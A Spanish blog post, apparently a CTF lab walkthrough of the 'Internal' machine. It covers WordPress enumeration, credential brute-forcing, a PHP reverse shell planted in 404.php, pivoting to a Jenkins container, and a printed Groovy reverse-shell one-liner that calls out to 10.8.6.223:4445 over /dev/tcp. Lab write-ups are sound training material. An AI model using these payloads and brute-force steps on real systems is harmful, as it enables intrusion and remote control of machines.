El reto de esta maquina consiste en localizar dos banderas:<\/p>\n\n\n\n
User.txt<\/li>
Root.txt<\/li><\/ul>\n\n\n\n
Ademas realizaremos la t\u00e9cnica de Pivoting.<\/p>\n\n\n\n
Comenzamos primero, como siempre, buscando los puertos abiertos en la maquina y despu\u00e9s realizaremos un an\u00e1lisis m\u00e1s completo de estos obteniendo versiones y otros datos de esos servicios.<\/p>\n\n\n\n
Vemos dos servicios SSH y HTTP, iniciaremos la exploraci\u00f3n por el que normalmente localiza m\u00e1s huecos que es el servidor HTTP.<\/p>\n\n\n\n
En una primera mirada, incluso ejecutando \u00abwhatweb<\/em>\u00bb para identificar que se esta ejecutando parece que es solo un apache y que todav\u00eda no tenemos p\u00e1ginas configuradas. Profundizamos m\u00e1s y analizamos los directorios.<\/p>\n\n\n\n
dirb <URL><\/code><\/pre>\n\n\n\n
Descubrimos algunos directorios de inter\u00e9s, que nos indican aplicaciones instaladas.<\/p>\n\n\n\n
\/blog Posible WordPress por los subdirectorios: wp-admin, wp-content.<\/li>
\/wordpress<\/li>
\/phpmyadmin Posible aplicaci\u00f3n de gesti\u00f3n de BBDD.<\/li>
\/javascript contiene jquery.<\/li><\/ul>\n\n\n\n
Intentamos ahora la identificaci\u00f3n con \u00abwhatweb<\/em>\u00bb de estas entradas, ademas de conectarnos directamente desde el navegador.<\/p>\n\n\n\n
whatweb -a 3 http:\/\/<IP>\/blog\nwhatweb -a 3 http:\/\/<IP>\/wodpress\nwhatweb -a 3 http:\/\/<IP>\/phpmyadmin<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n
Vemos que son dos WordPress y una aplicaci\u00f3n PHPmyAdmin. As\u00ed que vamos a centrarnos en el WordPress del directorio \/blog cuya informaci\u00f3n incial es:<\/p>\n\n\n\n
Servidor Apache 2.4.9<\/li>
WordPress 5.4.2<\/li><\/ul>\n\n\n\n
Uutilizando la herramienta \u00abwpscan\u00bb para obtener m\u00e1s informaci\u00f3n del gestor de contenidos WordPress instalado como sun los plugin vulnerables, usuarios.<\/p>\n\n\n\n
wpscan --url <URL> -e vp,vt,u\nwpscan --url <URL> -U <Usuario> -P <F_Claves> \/\/Claves por fuerza bruta de los usuarios<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n
Informaci\u00f3n adicional interesante que obtenemos al ejecutar estos dos comandos son:<\/p>\n\n\n\n
XML-RPC habilitado<\/li>
Wp-cron habilitado<\/li>
Usuarios encontrados: admin<\/em>, el cual tambi\u00e9n hemos logrado obtener su clave.<\/li><\/ul>\n\n\n\n
Lo cual nos permite acceder al panel de control (http:\/\/internal.thm\/blog\/wp-login.php) antes definiremos en nuestro \/etc\/hosts la entrada \u00abinternal.thm\u00bb con la IP de la maquina para no tener problemas en la carga. Dentro del administrador podremos crear un fichero PHP con un Shel-Inverso<\/em>-In que nos abra un Shell. Usaremos la pagina 404.php que es la que se produce en caso de error.<\/p>\n\n\n\n
Usaremos el Shell inverso \u00abhttps:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php\u00bb cuyo contenido es el que sustituir\u00e1 el PHP \u00ab404.php\u00bb cambiando nuestra IP y el puerto<\/p>\n\n\n\n
Una vez en el sistema empezaremos con una enumeraci\u00f3n para localizar la bandera y escalada de privilegios si es necesario, para la enumeraci\u00f3n del sistema usaremos LinPEAS, vemos datos interesantes para una escala de privilegios:<\/p>\n\n\n\n
SO: Confirmamos que es un Linux 4.15.0-112-generic, Ubuntu 18.04<\/li>
La versi\u00f3n del sudo 1.8.21p2, pero al comprobar en comando vemos que no tenemos permiso de sudo con este usuario.<\/li>
Vemos que nos da dos vulnerabilidades en especial CVE-2021-4034 y CVE-2022-2588, ademas de otras a probar.<\/li>
El SSH nos permite logarnos como root \u00abPermitRootLogin yes<\/em><\/strong>\u00ab<\/li>
Directorio \/opt<\/strong> que normalmente esta vaci\u00f3, as\u00ed que iremos a el a ver si podemos obtener algo.<\/li>
Obtiene las claves de ficheros PHP, como la BBDD de wordpress (fichero wp-config.php) y el usuario phpmyadmin.<\/li>
Y otra informaci\u00f3n que revisar\u00edamos si con esta no es suficiente para localizar las banderas.<\/li><\/ul>\n\n\n\n<\/figure>\n\n\n\n
Vamos a ver contenidos de los ficheros de \/opt y vemos un directorio que no tenemos acceso y un fichero \u00abwp-save.txt\u00bb que parece nos da la clave del usuario aubreanna.<\/p>\n\n\n\n
Asi que intentamos conectarnos por ssh a este usuario.<\/p>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n
Vemos el fichero user.txt, con lo cual logramos la primera bandera, y ademas otros ficheros que miramos su contenido por si nos dan alguna informaci\u00f3n como sucede con el fichero \u00abjenkins.txt\u00bb que nos indica que en la 172.17.0.2 esta el servicio jenkins. Realizamos un ifconfig<\/em> y comprobamos que tenemos acceso a esa red, ademas miramos si alguien escucha en ese puerto y tambien vemos que es as\u00ed.<\/p>\n\n\n\n
Para probar a conectarnos con el navegador debemos realizar una redirecci\u00f3n.<\/p>\n\n\n\n
Ahora podemos conectarnos a la direcci\u00f3n 172.17.0.2:8080 desde nuestra maquina invocando a 127.0.0.1:8080 y vemos que es la pagina de jenkins. As\u00ed que vamos a intentar localizar la clave del usuario admin con Hydra.<\/p>\n\n\n\n
Lo primero sera analizar el codigo de la pagina para conocer la acci\u00f3n, la variable usuario y la variable clave.<\/p>\n\n\n\n
Accion: j_acegi_security_check<\/li>
Nombre: j_username<\/li>
Clave: j_password<\/li><\/ul>\n\n\n\n
Ahora ya podemos montar el comando Hydra<\/p>\n\n\n\n
Obteniendo la clave del usuario admin que nos permitir\u00e1 acceder a la aplicaci\u00f3n, ahora podemos crear un shell-inverso en Grovy( lenguaje de jenkins) y as\u00ed obtener un shell en la maquina.<\/p>\n\n\n\n
r = Runtime.getRuntime()\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5<>\/dev\/tcp\/10.8.6.223\/4445;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n
No vemos el fichero root.txt al realizar un find pero encontramos uno que nos puede contener informaci\u00f3n \u00fatil \u00ab\/op\/note.txt\u00bb y al verlo parece que es el usuario root de nuestra maquina.<\/p>\n\n\n\n
Realizamos un su en la otra maquina con esta clave y vemos que accedemos y que ahora tenemos acceso a \u00ab\/root\/root.txt\u00bb que al realizar el cat vemos la bandera de root.<\/p>\n\n\n\n
El reto de esta maquina consiste en localizar dos banderas: User.txt Root.txt Ademas realizaremos la t\u00e9cnica de Pivoting. Comenzamos primero, como siempre, buscando los puertos abiertos en la maquina y despu\u00e9s realizaremos un an\u00e1lisis m\u00e1s completo de estos obteniendo versiones y otros datos de esos servicios. Vemos dos servicios SSH y HTTP, iniciaremos la exploraci\u00f3n […]<\/p>\n","protected":false},"author":1,"featured_media":965,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[110,19,184,16],"tags":[131,185,87,183,88,90,91],"class_list":["post-946","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-escalar-privilegios","category-pivoting","category-seguridad","tag-dirb","tag-linpeas","tag-nmap","tag-pivoting","tag-whatweb","tag-wordpress","tag-wpscan"],"_links":{"self":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/946","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/comments?post=946"}],"version-history":[{"count":13,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/946\/revisions"}],"predecessor-version":[{"id":977,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/posts\/946\/revisions\/977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/media\/965"}],"wp:attachment":[{"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/media?parent=946"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/categories?post=946"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.pinguytaz.net\/index.php\/wp-json\/wp\/v2\/tags?post=946"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-19.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-20-1024x281.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-21.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-22.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-23.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-24.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-26.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-25.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-27.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-29.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-32.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.pinguytaz.net\/wp-content\/uploads\/2022\/10\/image-31.png\")
<\/figure>\n\n\n\n